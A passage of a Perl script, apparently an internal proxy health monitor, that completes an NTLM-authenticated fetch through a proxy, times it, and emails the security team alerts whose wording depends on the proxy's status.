$negotiate_msg = "Proxy-" . $negotiate_msg ;
@pa = split(/:/,$negotiate_msg);
$req->header($pa[0] => $pa[1]);
$res = $ua->request($req);

#Strips the NTLM challenge message from the response header and parses it
my $challenge_msg = "Proxy-Authenticate: " . $res->header("Proxy-Authenticate");

($domain, $flags, $nonce, $ctx_upper, $ctx_lower) = $client->http_parse_challenge($challenge_msg);

if ($domain or $ctx_upper or $ctx_lower){$placeholder=1;}

#Takes the nonce and flags from the challenge message , calculates the final authentication message, sets it as a header and sends it in the final request, recieving the originally requested page in response
$flags = Authen::NTLM::NTLMSSP_NEGOTIATE_ALWAYS_SIGN | Authen::NTLM::NTLMSSP_NEGOTIATE_NTLM | Authen::NTLM::NTLMSSP_REQUEST_TARGET;
$auth_msg = $client->http_auth($nonce, $flags);

@pa = split(/:/,$auth_msg);
$req->header($pa[0] => $pa[1]);
$res = $ua->request($req);

#Stops the timer, calculates the elapsed time rounding to the nearest hudnredth of a second and returns that value to the main thread
my $end = gettimeofday();
my $delta = ($end - $start);
$delta= nearest(.01,$delta);
print "Finished getting $url through $proxy in $delta seconds! \n";
return $delta;

}

#This function actually handles the generation of the email alert for a status change. Depending on the status it picks from different wordings in the email subject and message.
sub Alert{
my $proxy = $_[0];
my $status=$_[1];


if ($status eq 'GOOD'){
$subject="Subject: $proxy has returned to Normal Operation";
$message = "The ProxyHealth Monitor has detected that proxy $proxy has returned to a 'GOOD' status and is retrieving pages within an acceptable timeframe.";
}
elsif ($status eq 'SLOW'){
$subject="Subject: $proxy is experiecing delay";
$message="The ProxyHealth Monitor has detected that the proxy $proxy is experiencing slowness in processing web requests. The system will continue to monitor and will send an update when the status changes.";
}
elsif($status eq 'MINOR'){
$subject="Subject: $proxy is experiencing a Performance Problem";
$message="The ProxyHealth Monitor has detected that the proxy $proxy is suffering noticeable slowness in processing web requests. It's current status is rated as 'MINOR'. The system will continue to monitor and will send an update when the status changes.";
}
elsif($status eq 'MAJOR'){
$subject="Subject: $proxy is experiencing a Major Performance Problem";
$message="The ProxyHealth Monitor has detected that the proxy $proxy is suffering serious slowness in processing web requests. It's current status is rated as 'MAJOR'. The system will continue to monitor and will send an update when the status changes.";
}
elsif($status eq 'CRITICAL'){
$subject="Subject: $proxy is experiencing a Critical Performance Problem";
$message="The ProxyHealth Monitor has detected that the proxy $proxy is facing a 'CRITICAL' performance decrease. Web traffic throguh this proxy will be extremely slow. The system will continue to monitor and will send an update when the status changes.";
}
elsif($status eq 'DOWN'){
$subject="Subject: $proxy is DOWN!";
$message="The ProxyHealth Monitor has detected that traffic through $proxy is exceeding the timeout limit of 2 minutes. This has led to the system declaring the proxy as being 'DOWN'. Web requests through this proxy will FAIL due to timeout. The system will continue to monitor and will send an update when the status changes.";
}



my $mailer= Net::SMTP->new(, Hello=> );
$mailer->mail();
$mailer->to();
$mailer->data();
#Sets the UK and US Security Team Distribution lists as the Recipients
$mailer->datasend('To: , ');
$mailer->datasend("\n");
$mailer->datasend('Return-Path:');
$mailer->datasend("\n");
#Sets a header that will tell the mail client that replies are to go to the Security Distribution lists and not back to the fake address used to send the alert.
$mailer->datasend('Reply-To:, ');
$mailer->datasend("\n");
$mailer->datasend('FROM:');
$mailer->datasend("\n");
#Sets the message importance to high
$mailer->datasend('Importance: High');
$mailer->datasend("\n");
$mailer->datasend($subject);
$mailer->datasend("\n\n");
$mailer->datasend($message);
$mailer->dataend();
$mailer->quit;



}